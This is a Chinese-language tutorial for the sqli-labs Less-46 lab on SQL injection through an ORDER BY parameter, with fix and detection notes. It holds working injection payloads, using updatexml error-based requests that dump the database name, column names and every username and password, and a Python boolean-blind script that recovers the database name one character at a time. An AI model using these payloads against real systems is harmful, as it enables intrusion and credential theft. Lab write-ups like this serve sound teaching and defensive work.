从本关(Less-46)开始,我们学习 order by 相关的注入知识。
尝试 ?sort=1 desc 或 ?sort=1 asc(降序或升序排列),若显示结果不同,则表明 sort 的值被直接拼接进了 order by 子句,可以注入。
sort=1时是第一列Id
sort=2时是第二列 username
sort=3时是第三列 password
当sort=4时报错
这相当于利用 order by 来判断查询结果的字段数(sort=4 报错,说明只有 3 列)。
利用报错注入(依赖页面回显数据库错误信息;根本的修复是对 sort 做列名/排序方向的白名单校验,而不是仅关闭错误回显)
爆库
?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)--+
爆字段(users 表的列名)
?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+
查看username,password字段下的所有值
?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username,password)%20from%20security.users),0x7e),1)--+
Python 脚本(布尔盲注:通过 rand() 让排序结果随条件真假而变化,逐字符判断数据库名)
import requests
from urllib.parse import urlencode
from bs4 import BeautifulSoup
# Target is the sqli-labs training page (Less-46) served on loopback.
url1 = "http://127.0.0.1/sqli-labs/Less-46/index.php"
def orderby_inject_database(url1):
    """Recover the current database name from the sqli-labs Less-46 page.

    The page places the ``sort`` request parameter into an ORDER BY clause.
    This function sends ``rand(<comparison>)`` as the sort expression and reads
    the second ``<td>`` of the response; a value of ``"admin3"`` is treated as
    "comparison true". Each character of ``database()`` is found by binary
    search over the code points 32..128, and the partial name is printed after
    every recovered character. Nothing is returned.

    Root cause and fix: the ORDER BY operand is attacker-controlled. Map the
    parameter to an allow-list of column names/directions on the server side.

    Detection: every probe is a GET whose ``sort`` value contains
    ``rand(ascii(mid(``, with roughly seven probes per recovered character,
    which stands out in web-server or WAF logs.

    Args:
        url1: URL of the Less-46 ``index.php`` page.
    """
    # NOTE(review): indentation was lost on the page; the progress print is
    # assumed to sit inside the per-character loop -- confirm against the original.
    recovered = ''
    for position in range(1, 100):
        lo, hi = 32, 128
        while lo < hi:
            guess = (lo + hi) // 2
            payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (position, guess)
            # NOTE(review): no timeout is set, so a stalled server blocks here.
            response = requests.get(url1, params={"sort": payload})
            # if 'You are in...........' in r.text:
            cells = BeautifulSoup(response.text, 'html.parser').find_all('td')
            # Presumably the username column of the first result row; raises
            # IndexError if the page renders fewer than two cells (e.g. an error page).
            first_username = cells[1].text
            if first_username == "admin3":
                lo = guess + 1
            else:
                hi = guess
        # The search has converged, so lo == hi is the recovered code point.
        # Converging on 32 is taken as "no character at this position".
        if lo == 32:
            break
        recovered = recovered + chr(lo)
        print(recovered)
# Run the extraction against the lab URL defined above; the function prints
# its progress and has no return statement.
orderby_inject_database(url1)